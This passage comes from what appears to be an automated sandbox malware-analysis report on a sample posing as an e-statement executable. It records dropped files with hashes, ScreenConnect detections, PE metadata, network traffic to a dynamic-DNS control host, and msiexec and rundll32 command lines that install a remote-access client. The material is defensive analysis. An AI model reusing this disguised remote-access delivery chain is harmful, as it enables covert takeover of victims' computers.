                                                                                                                          Malicious:false
                                                                                                                          Yara Hits:
                                                                                                                          • Rule: JoeSecurity_ScreenConnectTool, Description: Yara detected ScreenConnect Tool, Source: C:\Windows\Temp\~DF19F1C74538568FA2.TMP, Author: Joe Security
                                                                                                                          Preview:......................>...............................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                                                                                                                          Process:C:\Windows\System32\msiexec.exe
                                                                                                                          File Type:Composite Document File V2 Document, Cannot read section info
                                                                                                                          Category:dropped
                                                                                                                          Size (bytes):20480
                                                                                                                          Entropy (8bit):1.8174271012815317
                                                                                                                          Encrypted:false
                                                                                                                          SSDEEP:96:7hM1zjT8aWpo6fL6zd+NRBkYlEq2e6kD:u1PYzpo6WaBkIT6k
                                                                                                                          MD5:A5AD3FDFC038F38EAC2E01BAB4997D14
                                                                                                                          SHA1:089BBC2AE23F3525C2C20114BED987A94F09C1A5
                                                                                                                          SHA-256:6FA0608162FDA5D7D6FD2447E38C03E504B401F99388DD8209D5914897E4A79C
                                                                                                                          SHA-512:EF75F73B6715EADB056D2959689C50666FE08EC2BA96E51662F4C93A3B145340E4E1011275CC466890AF2935D4E46BE92EDE232F48CADFACE249B4519D45031B
                                                                                                                          Malicious:false
                                                                                                                          Yara Hits:
                                                                                                                          • Rule: JoeSecurity_ScreenConnectTool, Description: Yara detected ScreenConnect Tool, Source: C:\Windows\Temp\~DF2437BA2833AB9893.TMP, Author: Joe Security
                                                                                                                          Preview:......................>...............................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                                                                                                                          Process:C:\Windows\System32\msiexec.exe
                                                                                                                          File Type:data
                                                                                                                          Category:dropped
                                                                                                                          Size (bytes):32768
                                                                                                                          Entropy (8bit):0.07741335036671994
                                                                                                                          Encrypted:false
                                                                                                                          SSDEEP:6:2/9LG7iVCnLG7iVrKOzPLHKOSWS9RiVSKChiVky6l51:2F0i8n0itFzDHFtw7r
                                                                                                                          MD5:3ECE67DFCBADAD2A7C3CF6E72847EC97
                                                                                                                          SHA1:1D500C5D2B84A471C3FF7EE06C6D04E66381D0F6
                                                                                                                          SHA-256:AFE50E33DFEBA11C8B5DE75C19DA2A7FEE4B49E42F5A7C96F4B015AE357CE79B
                                                                                                                          SHA-512:DBDDAF3D7C878DB1EFA61B0BE94A9C7D336895569A016BA6B5F53AA525E3B81E2E7DF703B8E009C0FD694A1A022E36552F6C0BABC721965AFCB370D06B57602D
                                                                                                                          Malicious:false
                                                                                                                          Preview:........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                                                                                                                          Process:C:\Windows\System32\msiexec.exe
                                                                                                                          File Type:data
                                                                                                                          Category:dropped
                                                                                                                          Size (bytes):512
                                                                                                                          Entropy (8bit):0.0
                                                                                                                          Encrypted:false
                                                                                                                          SSDEEP:3::
                                                                                                                          MD5:BF619EAC0CDF3F68D496EA9344137E8B
                                                                                                                          SHA1:5C3EB80066420002BC3DCC7CA4AB6EFAD7ED4AE5
                                                                                                                          SHA-256:076A27C79E5ACE2A3D47F9DD2E83E4FF6EA8872B3C2218F66C92B89B55F36560
                                                                                                                          SHA-512:DF40D4A774E0B453A5B87C00D6F0EF5D753143454E88EE5F7B607134598294C7905CCBCF94BBC46E474DB6EB44E56A6DBB6D9A1BE9D4FB5D1B5F2D0C6ED34BFE
                                                                                                                          Malicious:false
                                                                                                                          Preview:................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                                                                                                                          Process:C:\Windows\System32\msiexec.exe
                                                                                                                          File Type:data
                                                                                                                          Category:dropped
                                                                                                                          Size (bytes):512
                                                                                                                          Entropy (8bit):0.0
                                                                                                                          Encrypted:false
                                                                                                                          SSDEEP:3::
                                                                                                                          MD5:BF619EAC0CDF3F68D496EA9344137E8B
                                                                                                                          SHA1:5C3EB80066420002BC3DCC7CA4AB6EFAD7ED4AE5
                                                                                                                          SHA-256:076A27C79E5ACE2A3D47F9DD2E83E4FF6EA8872B3C2218F66C92B89B55F36560
                                                                                                                          SHA-512:DF40D4A774E0B453A5B87C00D6F0EF5D753143454E88EE5F7B607134598294C7905CCBCF94BBC46E474DB6EB44E56A6DBB6D9A1BE9D4FB5D1B5F2D0C6ED34BFE
                                                                                                                          Malicious:false
                                                                                                                          Preview:................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                                                                                                                          Process:C:\Windows\System32\msiexec.exe
                                                                                                                          File Type:Composite Document File V2 Document, Cannot read section info
                                                                                                                          Category:dropped
                                                                                                                          Size (bytes):32768
                                                                                                                          Entropy (8bit):1.4321547089312856
                                                                                                                          Encrypted:false
                                                                                                                          SSDEEP:48:AppkuTrh8FXzJT5aU/t95UyB7qcq56Adu0U6SiL6zd+AfjKRBf8Yl/T4wM02NoKJ:SkZ3ToBaWpo6fL6zd+NRBkYlEq2e6kD
                                                                                                                          MD5:60273BCE3676EEBE01F7EDF76DDDBC2A
                                                                                                                          SHA1:4A2EC2ACFE86A7D37778F9488A7625EE5B3DAE16
                                                                                                                          SHA-256:43479D2A939BE897389C56382A2C570B58E58ACCE3CF444209CD9E69C1F86859
                                                                                                                          SHA-512:0D4DA5D08EF3FC5752A2CAB7AE9F34008E5BEBA163E84660BD50FCF711C5A54EFB2CA018195507B5F9F0070A84DB7BFC22C7AE3490F8F5C362C83F2EE6A46DD7
                                                                                                                          Malicious:false
                                                                                                                          Yara Hits:
                                                                                                                          • Rule: JoeSecurity_ScreenConnectTool, Description: Yara detected ScreenConnect Tool, Source: C:\Windows\Temp\~DF4F6677D5CBA456DC.TMP, Author: Joe Security
                                                                                                                          Preview:......................>...............................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                                                                                                                          Process:C:\Windows\System32\msiexec.exe
                                                                                                                          File Type:Composite Document File V2 Document, Cannot read section info
                                                                                                                          Category:dropped
                                                                                                                          Size (bytes):20480
                                                                                                                          Entropy (8bit):1.8174271012815317
                                                                                                                          Encrypted:false
                                                                                                                          SSDEEP:96:7hM1zjT8aWpo6fL6zd+NRBkYlEq2e6kD:u1PYzpo6WaBkIT6k
                                                                                                                          MD5:A5AD3FDFC038F38EAC2E01BAB4997D14
                                                                                                                          SHA1:089BBC2AE23F3525C2C20114BED987A94F09C1A5
                                                                                                                          SHA-256:6FA0608162FDA5D7D6FD2447E38C03E504B401F99388DD8209D5914897E4A79C
                                                                                                                          SHA-512:EF75F73B6715EADB056D2959689C50666FE08EC2BA96E51662F4C93A3B145340E4E1011275CC466890AF2935D4E46BE92EDE232F48CADFACE249B4519D45031B
                                                                                                                          Malicious:false
                                                                                                                          Yara Hits:
                                                                                                                          • Rule: JoeSecurity_ScreenConnectTool, Description: Yara detected ScreenConnect Tool, Source: C:\Windows\Temp\~DF76709002D0464E7C.TMP, Author: Joe Security
                                                                                                                          Preview:......................>...............................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                                                                                                                          Process:C:\Windows\System32\msiexec.exe
                                                                                                                          File Type:data
                                                                                                                          Category:dropped
                                                                                                                          Size (bytes):69632
                                                                                                                          Entropy (8bit):0.24090078355983027
                                                                                                                          Encrypted:false
                                                                                                                          SSDEEP:48:56bUaDBAdu0U6S3qcq56Adu0U6SiL6zd+AfjKRBf8Yl/T4wM02NoKrMB95UyT:5BE6xpo6fL6zd+NRBkYlEq286
                                                                                                                          MD5:E5ABAF4A2CB65BF448BC131BF4544F63
                                                                                                                          SHA1:B39D2BE9DB9F63DA6631D343897A11745063A5EE
                                                                                                                          SHA-256:F62958635AC6CF79C8B67C3B51059C7EB75A53E5E431E63FEB1A6B379DBFEEE6
                                                                                                                          SHA-512:DC991DD6EE74AA736BD2A2F940AC8CE536F40DB0D411E8EF7383868B5A40E64A3C2257B10C799EBD4F40BAB4C7CA0CE6899F9A893DAA3C32FB3617C638709366
                                                                                                                          Malicious:false
                                                                                                                          Yara Hits:
                                                                                                                          • Rule: JoeSecurity_ScreenConnectTool, Description: Yara detected ScreenConnect Tool, Source: C:\Windows\Temp\~DFBF7D55DE1B9E3016.TMP, Author: Joe Security
                                                                                                                          Preview:........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                                                                                                                          Process:C:\Windows\System32\msiexec.exe
                                                                                                                          File Type:Composite Document File V2 Document, Cannot read section info
                                                                                                                          Category:dropped
                                                                                                                          Size (bytes):32768
                                                                                                                          Entropy (8bit):1.4321547089312856
                                                                                                                          Encrypted:false
                                                                                                                          SSDEEP:48:AppkuTrh8FXzJT5aU/t95UyB7qcq56Adu0U6SiL6zd+AfjKRBf8Yl/T4wM02NoKJ:SkZ3ToBaWpo6fL6zd+NRBkYlEq2e6kD
                                                                                                                          MD5:60273BCE3676EEBE01F7EDF76DDDBC2A
                                                                                                                          SHA1:4A2EC2ACFE86A7D37778F9488A7625EE5B3DAE16
                                                                                                                          SHA-256:43479D2A939BE897389C56382A2C570B58E58ACCE3CF444209CD9E69C1F86859
                                                                                                                          SHA-512:0D4DA5D08EF3FC5752A2CAB7AE9F34008E5BEBA163E84660BD50FCF711C5A54EFB2CA018195507B5F9F0070A84DB7BFC22C7AE3490F8F5C362C83F2EE6A46DD7
                                                                                                                          Malicious:false
                                                                                                                          Yara Hits:
                                                                                                                          • Rule: JoeSecurity_ScreenConnectTool, Description: Yara detected ScreenConnect Tool, Source: C:\Windows\Temp\~DFD4485B77328D8A3B.TMP, Author: Joe Security
                                                                                                                          Preview:......................>...............................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                                                                                                                          Process:C:\Windows\System32\msiexec.exe
                                                                                                                          File Type:data
                                                                                                                          Category:dropped
                                                                                                                          Size (bytes):512
                                                                                                                          Entropy (8bit):0.0
                                                                                                                          Encrypted:false
                                                                                                                          SSDEEP:3::
                                                                                                                          MD5:BF619EAC0CDF3F68D496EA9344137E8B
                                                                                                                          SHA1:5C3EB80066420002BC3DCC7CA4AB6EFAD7ED4AE5
                                                                                                                          SHA-256:076A27C79E5ACE2A3D47F9DD2E83E4FF6EA8872B3C2218F66C92B89B55F36560
                                                                                                                          SHA-512:DF40D4A774E0B453A5B87C00D6F0EF5D753143454E88EE5F7B607134598294C7905CCBCF94BBC46E474DB6EB44E56A6DBB6D9A1BE9D4FB5D1B5F2D0C6ED34BFE
                                                                                                                          Malicious:false
                                                                                                                          Preview:................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                                                                                                                          File type:PE32 executable (GUI) Intel 80386, for MS Windows
                                                                                                                          Entropy (8bit):7.429449323610171
                                                                                                                          TrID:
                                                                                                                          • Win32 Executable (generic) Net Framework (10011505/4) 50.01%
                                                                                                                          • Win32 Executable (generic) a (10002005/4) 49.97%
                                                                                                                          • Generic Win/DOS Executable (2004/3) 0.01%
                                                                                                                          • DOS Executable Generic (2002/1) 0.01%
                                                                                                                          • Autodesk FLIC Image File (extensions: flc, fli, cel) (7/3) 0.00%
                                                                                                                          File name:estatement020134230003.exe.virus.exe
                                                                                                                          File size:5'620'176 bytes
                                                                                                                          MD5:3cc83797cf15bc705fa0b723f03fa5d4
                                                                                                                          SHA1:38773bb12d9223506573fd5e8eaf9d545b30573c
                                                                                                                          SHA256:c4e648e5d4284160fbe55ebafcb6f7bf1236f153d5ce0660cdb45568e1287f2f
                                                                                                                          SHA512:47615f003641bc64621ce7fa0b10b01c5a1bc4b5970d1724c16df6e335d2b0e51b9397f0d9241b31a69dbd71aa7f91d1b5322afd87b6136852dbcce3ecc27857
                                                                                                                          SSDEEP:49152:8EEL5cx5xTkYJkGYYpT0+TFiH7efP8Q1yJJ4ZD1F5z97oL1YbGQ+okRPGHpRPqM8:VEs6efPNwJ4t1h0cG5FGJRPxow8O
                                                                                                                          TLSH:C246E111B3DA95B9D4BF063CD87A82699A74BC044712C7EF53D4BD2D2D32BC05A323A6
                                                                                                                          File Content Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........_..E>`.E>`.E>`.....O>`.....?>`.....]>`..Ee.`>`..Ed.T>`..Ec.Q>`.LF..A>`.[l..F>`.E>a.%>`..Ei.D>`..E..D>`..Eb.D>`.RichE>`........
                                                                                                                          Icon Hash:90cececece8e8eb0
                                                                                                                          Entrypoint:0x4014ad
                                                                                                                          Entrypoint Section:.text
                                                                                                                          Digitally signed:true
                                                                                                                          Imagebase:0x400000
                                                                                                                          Subsystem:windows gui
                                                                                                                          Image File Characteristics:EXECUTABLE_IMAGE, 32BIT_MACHINE
                                                                                                                          DLL Characteristics:DYNAMIC_BASE, NX_COMPAT, TERMINAL_SERVER_AWARE
                                                                                                                          Time Stamp:0x6377E6AC [Fri Nov 18 20:10:20 2022 UTC]
                                                                                                                          TLS Callbacks:
                                                                                                                          CLR (.Net) Version:
                                                                                                                          OS Version Major:5
                                                                                                                          OS Version Minor:1
                                                                                                                          File Version Major:5
                                                                                                                          File Version Minor:1
                                                                                                                          Subsystem Version Major:5
                                                                                                                          Subsystem Version Minor:1
                                                                                                                          Import Hash:9771ee6344923fa220489ab01239bdfd
                                                                                                                          Signature Valid:true
                                                                                                                          Signature Issuer:CN=DigiCert Trusted G4 Code Signing RSA4096 SHA384 2021 CA1, O="DigiCert, Inc.", C=US
                                                                                                                          Signature Validation Error:The operation completed successfully
                                                                                                                          Error Number:0
                                                                                                                          Not Before, Not After
                                                                                                                          • 17/08/2022 01:00:00 16/08/2025 00:59:59
                                                                                                                          Subject Chain
                                                                                                                          • CN="Connectwise, LLC", O="Connectwise, LLC", L=Tampa, S=Florida, C=US
                                                                                                                          Version:3
                                                                                                                          Thumbprint MD5:AAE704EC2810686C3BF7704E660AFB5D
                                                                                                                          Thumbprint SHA-1:4C2272FBA7A7380F55E2A424E9E624AEE1C14579
                                                                                                                          Thumbprint SHA-256:82B4E7924D5BED84FB16DDF8391936EB301479CEC707DC14E23BC22B8CDEAE28
                                                                                                                          Serial:0B9360051BCCF66642998998D5BA97CE
                                                                                                                          Instruction
                                                                                                                          call 00007FCB94CCD94Ah
                                                                                                                          jmp 00007FCB94CCD3FFh
                                                                                                                          push ebp
                                                                                                                          mov ebp, esp
                                                                                                                          push 00000000h
                                                                                                                          call dword ptr [0040D040h]
                                                                                                                          push dword ptr [ebp+08h]
                                                                                                                          call dword ptr [0040D03Ch]
                                                                                                                          push C0000409h
                                                                                                                          call dword ptr [0040D044h]
                                                                                                                          push eax
                                                                                                                          call dword ptr [0040D048h]
                                                                                                                          pop ebp
                                                                                                                          ret
                                                                                                                          push ebp
                                                                                                                          mov ebp, esp
                                                                                                                          sub esp, 00000324h
                                                                                                                          push 00000017h
                                                                                                                          call dword ptr [0040D04Ch]
                                                                                                                          test eax, eax
                                                                                                                          je 00007FCB94CCD587h
                                                                                                                          push 00000002h
                                                                                                                          pop ecx
                                                                                                                          int 29h
                                                                                                                          mov dword ptr [004148D8h], eax
                                                                                                                          mov dword ptr [004148D4h], ecx
                                                                                                                          mov dword ptr [004148D0h], edx
                                                                                                                          mov dword ptr [004148CCh], ebx
                                                                                                                          mov dword ptr [004148C8h], esi
                                                                                                                          mov dword ptr [004148C4h], edi
                                                                                                                          mov word ptr [004148F0h], ss
                                                                                                                          mov word ptr [004148E4h], cs
                                                                                                                          mov word ptr [004148C0h], ds
                                                                                                                          mov word ptr [004148BCh], es
                                                                                                                          mov word ptr [004148B8h], fs
                                                                                                                          mov word ptr [004148B4h], gs
                                                                                                                          pushfd
                                                                                                                          pop dword ptr [004148E8h]
                                                                                                                          mov eax, dword ptr [ebp+00h]
                                                                                                                          mov dword ptr [004148DCh], eax
                                                                                                                          mov eax, dword ptr [ebp+04h]
                                                                                                                          mov dword ptr [004148E0h], eax
                                                                                                                          lea eax, dword ptr [ebp+08h]
                                                                                                                          mov dword ptr [004148ECh], eax
                                                                                                                          mov eax, dword ptr [ebp-00000324h]
                                                                                                                          mov dword ptr [00414828h], 00010001h
                                                                                                                          Programming Language:
                                                                                                                          • [IMP] VS2008 SP1 build 30729
                                                                                                                          • [IMP] VS2008 build 21022
                                                                                                                          NameVirtual AddressVirtual Size Is in Section
                                                                                                                          IMAGE_DIRECTORY_ENTRY_EXPORT0x00x0
                                                                                                                          IMAGE_DIRECTORY_ENTRY_IMPORT0x129c40x50.rdata
                                                                                                                          IMAGE_DIRECTORY_ENTRY_RESOURCE0x160000x533074.rsrc
                                                                                                                          IMAGE_DIRECTORY_ENTRY_EXCEPTION0x00x0
                                                                                                                          IMAGE_DIRECTORY_ENTRY_SECURITY0x5462000x15fd0
                                                                                                                          IMAGE_DIRECTORY_ENTRY_BASERELOC0x54a0000xea8.reloc
                                                                                                                          IMAGE_DIRECTORY_ENTRY_DEBUG0x11f200x70.rdata
                                                                                                                          IMAGE_DIRECTORY_ENTRY_COPYRIGHT0x00x0
                                                                                                                          IMAGE_DIRECTORY_ENTRY_GLOBALPTR0x00x0
                                                                                                                          IMAGE_DIRECTORY_ENTRY_TLS0x00x0
                                                                                                                          IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG0x11e600x40.rdata
                                                                                                                          IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT0x00x0
                                                                                                                          IMAGE_DIRECTORY_ENTRY_IAT0xd0000x13c.rdata
                                                                                                                          IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT0x00x0
                                                                                                                          IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR0x00x0
                                                                                                                          IMAGE_DIRECTORY_ENTRY_RESERVED0x00x0
                                                                                                                          NameVirtual AddressVirtual SizeRaw SizeMD5Xored PEZLIB ComplexityFile TypeEntropyCharacteristics
                                                                                                                          .text0x10000xb1af0xb200d9fa6da0baf4b869720be833223490cbFalse0.6123156601123596data6.592039633797327IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
                                                                                                                          .rdata0xd0000x60780x62008b45a1035c0de72f910a75db7749f735False0.41549744897959184data4.786621464556291IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
                                                                                                                          .data0x140000x11e40x8001f4cc86b6735a74429c9d1feb93e2871False0.18310546875data2.265083745848167IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                                                                                                                          .rsrc0x160000x5330740x533200d813d73373778ed5b0a4b71b252379ebunknownunknownunknownunknownIMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
                                                                                                                          .reloc0x54a0000xea80x1000a93b0f39998e1e69e5944da8c5ff06b1False0.72265625data6.301490309336801IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_READ
                                                                                                                          NameRVASizeTypeLanguageCountryZLIB Complexity
                                                                                                                          FILES0x163d40x86000PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows0.3962220149253731
                                                                                                                          FILES0x9c3d40x1a4600PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows0.5111589431762695
                                                                                                                          FILES0x2409d40x1ac00PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows0.4415066442757009
                                                                                                                          FILES0x25b5d40x2ec318PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows0.9810924530029297
                                                                                                                          FILES0x5478ec0x1600PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows0.3908025568181818
                                                                                                                          RT_MANIFEST0x548eec0x188XML 1.0 document, ASCII text, with CRLF line terminatorsEnglishUnited States0.5892857142857143
                                                                                                                          DLLImport
                                                                                                                          mscoree.dllCorBindToRuntimeEx
                                                                                                                          KERNEL32.dllGetModuleFileNameA, DecodePointer, SizeofResource, LockResource, LoadLibraryW, LoadResource, FindResourceW, GetProcAddress, WriteConsoleW, SetFilePointerEx, GetConsoleMode, GetConsoleCP, FlushFileBuffers, HeapReAlloc, HeapSize, UnhandledExceptionFilter, SetUnhandledExceptionFilter, GetCurrentProcess, TerminateProcess, IsProcessorFeaturePresent, QueryPerformanceCounter, GetCurrentProcessId, GetCurrentThreadId, GetSystemTimeAsFileTime, InitializeSListHead, IsDebuggerPresent, GetStartupInfoW, GetModuleHandleW, RtlUnwind, GetLastError, SetLastError, EncodePointer, EnterCriticalSection, LeaveCriticalSection, DeleteCriticalSection, InitializeCriticalSectionAndSpinCount, TlsAlloc, TlsGetValue, TlsSetValue, TlsFree, FreeLibrary, LoadLibraryExW, RaiseException, GetStdHandle, WriteFile, CreateFileW, MultiByteToWideChar, WideCharToMultiByte, ExitProcess, GetModuleHandleExW, GetACP, CloseHandle, HeapAlloc, HeapFree, FindClose, FindFirstFileExA, FindNextFileA, IsValidCodePage, GetOEMCP, GetCPInfo, GetCommandLineA, GetCommandLineW, GetEnvironmentStringsW, FreeEnvironmentStringsW, LCMapStringW, SetStdHandle, GetFileType, GetStringTypeW, GetProcessHeap
                                                                                                                          OLEAUT32.dllVariantInit, SafeArrayUnaccessData, SafeArrayCreateVector, SafeArrayDestroy, VariantClear, SafeArrayAccessData
                                                                                                                          Language of compilation systemCountry where language is spokenMap
                                                                                                                          EnglishUnited States
                                                                                                                          TimestampSource PortDest PortSource IPDest IP
                                                                                                                          Dec 5, 2024 20:00:09.732281923 CET497318041192.168.2.4195.250.25.144
                                                                                                                          Dec 5, 2024 20:00:09.852380037 CET804149731195.250.25.144192.168.2.4
                                                                                                                          Dec 5, 2024 20:00:09.852463961 CET497318041192.168.2.4195.250.25.144
                                                                                                                          Dec 5, 2024 20:00:10.631320000 CET497318041192.168.2.4195.250.25.144
                                                                                                                          Dec 5, 2024 20:00:10.751071930 CET804149731195.250.25.144192.168.2.4
                                                                                                                          Dec 5, 2024 20:00:11.010303974 CET804149731195.250.25.144192.168.2.4
                                                                                                                          Dec 5, 2024 20:00:11.069205999 CET497318041192.168.2.4195.250.25.144
                                                                                                                          Dec 5, 2024 20:00:11.189167023 CET804149731195.250.25.144192.168.2.4
                                                                                                                          Dec 5, 2024 20:00:11.424650908 CET804149731195.250.25.144192.168.2.4
                                                                                                                          Dec 5, 2024 20:00:11.579396009 CET497318041192.168.2.4195.250.25.144
                                                                                                                          Dec 5, 2024 20:00:11.617295980 CET804149731195.250.25.144192.168.2.4
                                                                                                                          Dec 5, 2024 20:00:11.766891956 CET497318041192.168.2.4195.250.25.144
                                                                                                                          Dec 5, 2024 20:00:13.098905087 CET497318041192.168.2.4195.250.25.144
                                                                                                                          Dec 5, 2024 20:00:13.098906040 CET497318041192.168.2.4195.250.25.144
                                                                                                                          Dec 5, 2024 20:00:13.220366955 CET804149731195.250.25.144192.168.2.4
                                                                                                                          Dec 5, 2024 20:00:13.220395088 CET804149731195.250.25.144192.168.2.4
                                                                                                                          Dec 5, 2024 20:00:13.220403910 CET804149731195.250.25.144192.168.2.4
                                                                                                                          Dec 5, 2024 20:00:13.221169949 CET804149731195.250.25.144192.168.2.4
                                                                                                                          Dec 5, 2024 20:00:13.221179962 CET804149731195.250.25.144192.168.2.4
                                                                                                                          Dec 5, 2024 20:00:13.221230030 CET804149731195.250.25.144192.168.2.4
                                                                                                                          Dec 5, 2024 20:00:13.537091970 CET804149731195.250.25.144192.168.2.4
                                                                                                                          Dec 5, 2024 20:00:13.673157930 CET497318041192.168.2.4195.250.25.144
                                                                                                                          Dec 5, 2024 20:01:13.548253059 CET497318041192.168.2.4195.250.25.144
                                                                                                                          Dec 5, 2024 20:01:13.668051958 CET804149731195.250.25.144192.168.2.4
                                                                                                                          Dec 5, 2024 20:02:13.673501015 CET497318041192.168.2.4195.250.25.144
                                                                                                                          Dec 5, 2024 20:02:13.793576002 CET804149731195.250.25.144192.168.2.4
                                                                                                                          TimestampSource PortDest PortSource IPDest IP
                                                                                                                          Dec 5, 2024 20:00:07.583744049 CET6428953192.168.2.41.1.1.1
                                                                                                                          Dec 5, 2024 20:00:08.579721928 CET6428953192.168.2.41.1.1.1
                                                                                                                          Dec 5, 2024 20:00:09.595283985 CET6428953192.168.2.41.1.1.1
                                                                                                                          Dec 5, 2024 20:00:09.702439070 CET53642891.1.1.1192.168.2.4
                                                                                                                          Dec 5, 2024 20:00:09.702462912 CET53642891.1.1.1192.168.2.4
                                                                                                                          Dec 5, 2024 20:00:09.733725071 CET53642891.1.1.1192.168.2.4
                                                                                                                          TimestampSource IPDest IPTrans IDOP CodeNameTypeClassDNS over HTTPS
                                                                                                                          Dec 5, 2024 20:00:07.583744049 CET192.168.2.41.1.1.10x9970Standard query (0)learnskillboosts.con-ip.comA (IP address)IN (0x0001)false
                                                                                                                          Dec 5, 2024 20:00:08.579721928 CET192.168.2.41.1.1.10x9970Standard query (0)learnskillboosts.con-ip.comA (IP address)IN (0x0001)false
                                                                                                                          Dec 5, 2024 20:00:09.595283985 CET192.168.2.41.1.1.10x9970Standard query (0)learnskillboosts.con-ip.comA (IP address)IN (0x0001)false
                                                                                                                          TimestampSource IPDest IPTrans IDReply CodeNameCNameAddressTypeClassDNS over HTTPS
                                                                                                                          Dec 5, 2024 20:00:09.702439070 CET1.1.1.1192.168.2.40x9970No error (0)learnskillboosts.con-ip.com195.250.25.144A (IP address)IN (0x0001)false
                                                                                                                          Dec 5, 2024 20:00:09.702462912 CET1.1.1.1192.168.2.40x9970No error (0)learnskillboosts.con-ip.com195.250.25.144A (IP address)IN (0x0001)false
                                                                                                                          Dec 5, 2024 20:00:09.733725071 CET1.1.1.1192.168.2.40x9970No error (0)learnskillboosts.con-ip.com195.250.25.144A (IP address)IN (0x0001)false

                                                                                                                          Click to jump to process

                                                                                                                          Click to jump to process

                                                                                                                          Click to dive into process behavior distribution

                                                                                                                          Click to jump to process

                                                                                                                          Target ID:0
                                                                                                                          Start time:13:59:59
                                                                                                                          Start date:05/12/2024
                                                                                                                          Path:C:\Users\user\Desktop\estatement020134230003.exe.virus.exe
                                                                                                                          Wow64 process (32bit):true
                                                                                                                          Commandline:"C:\Users\user\Desktop\estatement020134230003.exe.virus.exe"
                                                                                                                          Imagebase:0xfd0000
                                                                                                                          File size:5'620'176 bytes
                                                                                                                          MD5 hash:3CC83797CF15BC705FA0B723F03FA5D4
                                                                                                                          Has elevated privileges:true
                                                                                                                          Has administrator privileges:true
                                                                                                                          Programmed in:C, C++ or other language
                                                                                                                          Yara matches:
                                                                                                                          • Rule: JoeSecurity_ScreenConnectTool, Description: Yara detected ScreenConnect Tool, Source: 00000000.00000002.1739173914.0000000005270000.00000004.08000000.00040000.00000000.sdmp, Author: Joe Security
                                                                                                                          • Rule: JoeSecurity_ScreenConnectTool, Description: Yara detected ScreenConnect Tool, Source: 00000000.00000000.1699653527.0000000000FE6000.00000002.00000001.01000000.00000003.sdmp, Author: Joe Security
                                                                                                                          Reputation:low
                                                                                                                          Has exited:true

                                                                                                                          Target ID:1
                                                                                                                          Start time:14:00:00
                                                                                                                          Start date:05/12/2024
                                                                                                                          Path:C:\Windows\SysWOW64\msiexec.exe
                                                                                                                          Wow64 process (32bit):true
                                                                                                                          Commandline:"C:\Windows\System32\msiexec.exe" /i "C:\Users\user\AppData\Local\Temp\ScreenConnect\24.3.7.9067\8d1a70ac1b2b845c\ScreenConnect.ClientSetup.msi"
                                                                                                                          Imagebase:0xb80000
                                                                                                                          File size:59'904 bytes
                                                                                                                          MD5 hash:9D09DC1EDA745A5F87553048E57620CF
                                                                                                                          Has elevated privileges:true
                                                                                                                          Has administrator privileges:true
                                                                                                                          Programmed in:C, C++ or other language
                                                                                                                          Reputation:high
                                                                                                                          Has exited:true

                                                                                                                          Target ID:2
                                                                                                                          Start time:14:00:00
                                                                                                                          Start date:05/12/2024
                                                                                                                          Path:C:\Windows\System32\msiexec.exe
                                                                                                                          Wow64 process (32bit):false
                                                                                                                          Commandline:C:\Windows\system32\msiexec.exe /V
                                                                                                                          Imagebase:0x7ff75cca0000
                                                                                                                          File size:69'632 bytes
                                                                                                                          MD5 hash:E5DA170027542E25EDE42FC54C929077
                                                                                                                          Has elevated privileges:true
                                                                                                                          Has administrator privileges:true
                                                                                                                          Programmed in:C, C++ or other language
                                                                                                                          Reputation:high
                                                                                                                          Has exited:false

                                                                                                                          Target ID:3
                                                                                                                          Start time:14:00:01
                                                                                                                          Start date:05/12/2024
                                                                                                                          Path:C:\Windows\SysWOW64\msiexec.exe
                                                                                                                          Wow64 process (32bit):true
                                                                                                                          Commandline:C:\Windows\syswow64\MsiExec.exe -Embedding 9422C348B364C7554592E19E8B2A0DAC C
                                                                                                                          Imagebase:0xb80000
                                                                                                                          File size:59'904 bytes
                                                                                                                          MD5 hash:9D09DC1EDA745A5F87553048E57620CF
                                                                                                                          Has elevated privileges:true
                                                                                                                          Has administrator privileges:true
                                                                                                                          Programmed in:C, C++ or other language
                                                                                                                          Reputation:high
                                                                                                                          Has exited:true

                                                                                                                          Target ID:4
                                                                                                                          Start time:14:00:01
                                                                                                                          Start date:05/12/2024
                                                                                                                          Path:C:\Windows\SysWOW64\rundll32.exe
                                                                                                                          Wow64 process (32bit):true
                                                                                                                          Commandline:rundll32.exe "C:\Users\user\AppData\Local\Temp\MSI76AF.tmp",zzzzInvokeManagedCustomActionOutOfProc SfxCA_5732625 1 ScreenConnect.InstallerActions!ScreenConnect.ClientInstallerActions.FixupServiceArguments
                                                                                                                          Imagebase:0xda0000
                                                                                                                          File size:61'440 bytes
                                                                                                                          MD5 hash:889B99C52A60DD49227C5E485A016679
                                                                                                                          Has elevated privileges:true
